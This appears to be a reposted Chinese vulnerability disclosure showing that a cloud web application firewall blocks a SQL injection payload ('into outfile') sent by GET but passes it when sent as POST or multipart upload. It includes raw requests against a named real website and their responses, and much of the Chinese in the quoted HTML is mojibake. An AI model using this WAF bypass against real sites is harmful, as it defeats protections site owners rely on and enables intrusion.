来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了GET index php?id=1%2...
360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过
在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了
GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1 Host: www.xiangshu.com Connection: keep-alive Content-Length: 1778 HTTP/1.1 493 Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:21:35 GMT Content-Type: text/html Content-Length: 5538 Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn <!DOCTYPE html> <html> <head> <title>ç¦æ¢è®¿é—®</title> <meta charset="utf-8" /> <meta name="author" content="" /> <meta name="keywords" content="" /> <meta name="description" content="" /> <style> body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;} div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;} h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;} .wrap{width:715px; margin:50px auto;} .waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; } .waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;} .main{border:1px solid #D0D0D0; border-radius:10px;} .warning-domain{padding:10px 20px;} .warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;} .warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;} .warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;} .warning-conlist dl{position:relative;} .warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;} .warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;} .warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;} </style> </head> <body> <div class="wrap"> <h1 class="waring-tips1"><p>ç¦æ¢è®¿é—®</p></h1> <div class="main"> <dl class="warning-domain"> <dt id="host"></dt> <dd>您æ交的请求å˜åœ¨å±é™©å†…容,已被网站å«å£«æ‹¦æˆªï¼</dd> </dl> <div class="warning-conlist"> <dl> <dt>拦截网å€ï¼š</dt> <dd id="wurl"> </dd> </dl> <dl> <dt>拦截时间:</dt> <dd id="wdate">2013-03-28 16:19:25</dd> </dl> <dl style="margin-bottom:10px; border-bottom:1px solid #ccc"> <dt>处ç†ç»“果:</dt> <dd>IP已被记录并æ交至网络监察部门备案ï¼</dd> </dl> <p>如果您是站长,è¦ç»§ç»è®¿é—®ç½‘å€,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通é“]</a></p> <p >(站长绿色通é“:网站å«å£«ä¼šè‡ªåŠ¨å°†å½“å‰è¢«æ‹¦æˆªçš„URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3å°æ—¶ä¹‹å†…该URLä¸è¿›è¡Œå®‰å…¨æ£€æµ‹)</p> </div> </div> </div> <script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script> <script type="text/javascript"> function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // public method for encoding this.encode = function (input) { var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = _utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4); } return output; } // private method for UTF-8 encoding _utf8_encode = function (string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; } } function HTMLEncode(html) { var temp = document.createElement ("div"); (temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); var output = temp.innerHTML; temp = null; return output; } $(document).ready(function(){ $("#host").text(location.hostname); $("#wurl").text(HTMLEncode(location.href)); var myDate = new Date(); $("#wdate").text(myDate.toLocaleString()); }); function wubao(){ var host = location.hostname; location.href="fankui.html?"+host; } function tongdao(){ var host = location.hostname; var url = HTMLEncode(location.href); var index = url.indexOf("?"); if(index>0){ url = url.substr(0,index); } var b = new Base64(); url = b.encode(url); location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url; } </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-32745158-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
换成
POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1 Host: www.xiangshu.com Connection: keep-alive Content-Length: 1778 HTTP/1.1 493 Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:22:04 GMT Content-Type: text/html Content-Length: 5538 Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn <!DOCTYPE html> <html> <head> <title>ç¦æ¢è®¿é—®</title> <meta charset="utf-8" /> <meta name="author" content="" /> <meta name="keywords" content="" /> <meta name="description" content="" /> <style> body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;} div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;} h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;} .wrap{width:715px; margin:50px auto;} .waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; } .waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;} .waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;} .main{border:1px solid #D0D0D0; border-radius:10px;} .warning-domain{padding:10px 20px;} .warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;} .warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;} .warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;} .warning-conlist dl{position:relative;} .warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;} .warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;} .warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;} </style> </head> <body> <div class="wrap"> <h1 class="waring-tips1"><p>ç¦æ¢è®¿é—®</p></h1> <div class="main"> <dl class="warning-domain"> <dt id="host"></dt> <dd>您æ交的请求å˜åœ¨å±é™©å†…容,已被网站å«å£«æ‹¦æˆªï¼</dd> </dl> <div class="warning-conlist"> <dl> <dt>拦截网å€ï¼š</dt> <dd id="wurl"> </dd> </dl> <dl> <dt>拦截时间:</dt> <dd id="wdate">2013-03-28 16:19:25</dd> </dl> <dl style="margin-bottom:10px; border-bottom:1px solid #ccc"> <dt>处ç†ç»“果:</dt> <dd>IP已被记录并æ交至网络监察部门备案ï¼</dd> </dl> <p>如果您是站长,è¦ç»§ç»è®¿é—®ç½‘å€,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通é“]</a></p> <p >(站长绿色通é“:网站å«å£«ä¼šè‡ªåŠ¨å°†å½“å‰è¢«æ‹¦æˆªçš„URLåŠ å…¥é˜²ç«å¢™ç™½åå•ï¼Œåœ¨3å°æ—¶ä¹‹å†…该URLä¸è¿›è¡Œå®‰å…¨æ£€æµ‹)</p> </div> </div> </div> <script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script> <script type="text/javascript"> function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // public method for encoding this.encode = function (input) { var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = _utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4); } return output; } // private method for UTF-8 encoding _utf8_encode = function (string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; } } function HTMLEncode(html) { var temp = document.createElement ("div"); (temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); var output = temp.innerHTML; temp = null; return output; } $(document).ready(function(){ $("#host").text(location.hostname); $("#wurl").text(HTMLEncode(location.href)); var myDate = new Date(); $("#wdate").text(myDate.toLocaleString()); }); function wubao(){ var host = location.hostname; location.href="fankui.html?"+host; } function tongdao(){ var host = location.hostname; var url = HTMLEncode(location.href); var index = url.indexOf("?"); if(index>0){ url = url.substr(0,index); } var b = new Base64(); url = b.encode(url); location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url; } </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-32745158-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
即不拦
如果还拦就换成文件上传的方式
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7 Content-Disposition: form-data; name="folder" /blog/ ------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7 Content-Disposition: form-data; name="id" 1%20into%20outfile%20'/tmp/abc' HTTP/1.1 200 OK Server: nginx/1.2.9 Date: Thu, 28 Nov 2013 12:22:23 GMT Content-Type: text/html Connection: keep-alive X-Powered-By-360WZB: wangzhan.360.cn X-Powered-By: PHP/5.2.13 Content-Length: 6258 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="/css/main.css" /> <script type="text/javascript" src="/assets/b043222/jquery.js"></script> <script type="text/javascript" src="/css/cycle.js"></script> <title>æ©¡æ ‘æ‘„å½±ç½‘-ä¸å›½æ©¡æ ‘摄影爱好者俱ä¹éƒ¨ www.xiangshu.com</title> <meta name="Description" content="æ©¡æ ‘æ‘„å½±ç½‘ www.xiangshu.com ä¸å›½è§„模最大的摄影俱ä¹éƒ¨" /> <link rel="shortcut icon" href="http://www.xiangshu.com/images/xiangshu.ico" /> </head> <body> <div id="wrap"> <div id="header"> <div id="logo"> <div id="logopic"><a href=http://www.xiangshu.com/club/0><img src=http://www.2cto.com/uploadfile/2014/0113/20140113105359402.jpg border=0></a></div> <h1>ä¸å›½è§„模最大的摄影俱ä¹éƒ¨</h1> </div> <div id="club"><a href="/club/0">总站</a> <a style="font-size:12px;font-weight:normal;color:red" href="/site/club"> [æ¢åŸŽå¸‚]</a> </div> <div id="banner"> <div id="enter"> <a href=http://www.xiangshu.com/read.php?tid=1004568>网站çƒçº¿ç”µè¯:400-100-8885</a> | <a href=http://www.gxsyxy.com target="_blank">光线摄影å¦é™¢</a> | <a href=http://www.xiangshu.com/club/0>总站首页入å£</a> </div> <div class="clear"></div> <div id="subnav"> <ul> <li style="background:#006600"><a href=http://www.xiangshu.com/joining.php>注册å…费会员</a></li> <li style="background:#99CC00"><a href=http://www.xiangshu.com/read.php?tid=1004568>申请VIP会员</a> </li> <li style="background:#FF9900"><a href=http://www.xiangshu.com/membercard.php>æ†ç»‘会员å¡</a></li> <li style="background:#666666"><a href=http://www.xiangshu.com/about/7>景点åˆä½œå’Œæ¡ˆä¾‹</a> </li> </ul> </div> </div> </div> <div id="nav"> <div id="nav_l"></div> <div id="nav_bg"> <ul> <li><a href=http://www.xiangshu.com/pic/1>人 æ–‡</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/2>风 å…‰</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/3>美 女</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/4>创 æ„</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=2>摄影社区</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=64>é©´å‹ä¸“区</a></li> <li class="btn"><a href=http://www.xiangshu.com/site/club>æ›´æ¢åŸŽå¸‚分站</a></li> </ul> </div> <div id="nav_r"></div> </div> <div id="main"> <div id="index_top"></div> <div id="index_bg"> <div id="flash"> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359874.jpg" alt="进入其他城市å¯çœ‹æ›´å¤šå½“地精åŽå›¾ç‰‡" /></a> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359659.jpg" alt="进入其他城市å¯çœ‹æ›´å¤šå½“地精åŽå›¾ç‰‡" /></a> </div> <div id="map"> <div id="iframe"><iframe marginWidth="0" marginHeight="0" frameSpacing="0" src="http://www.xiangshu.com/map/" frameBorder="0" width="300" scrolling="no" height="242"></iframe></div> <div id="news"> <div id="news_tit"><span class="left">总站公告</span><span class="right">从地图进俱ä¹éƒ¨ [<a href=club.html>æ–‡å—å…¥å£</a>] </span></div> <div id="news_list"> <ul> <li> <dl> <dt><a target="_blank" href="/article/view/id/62">çƒçƒˆåº†ç¥æ©¡æ ‘摄影网创办9周年[å月二åå…]</a></dt> <dd>[10-20]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/61">æ©¡æ ‘ç½‘ä»£è¡¨åº”é‚€å‡ºå¸ä¸å›½ç¥žå†œæž¶åšå®¢é‚€è¯·èµ›</a></dt> <dd>[06-09]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/60">关于委托å”瑞先生赴景区洽谈åˆä½œçš„声明</a></dt> <dd>[04-19]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/59">网站å‡çº§:图片质é‡ä¸Šå‡åˆ°500K,开放外链</a></dt> <dd>[03-06]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/58">æ©¡æ ‘ç½‘å‰¯æ€»è£å’Œæœ¨çŽ‹å›½å®¶æ£®æž—å…¬å›ç¾çº¦</a></dt> <dd>[12-21]</dd> </dl> </li> </ul> </div> </div> </div> </div> <div id="index_bottom"></div> </div> <div id="hezuo"> <a href=http://www.xiangshu.com/about/6>å…³äºŽæ©¡æ ‘</a> - <a href=http://www.xiangshu.com/about/8>è”系我们</a> - <a href=http://www.xiangshu.com/link>å‹æƒ…链接</a> [粤ICP备11037153å·] </div> </body> </html>
就不拦了......
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com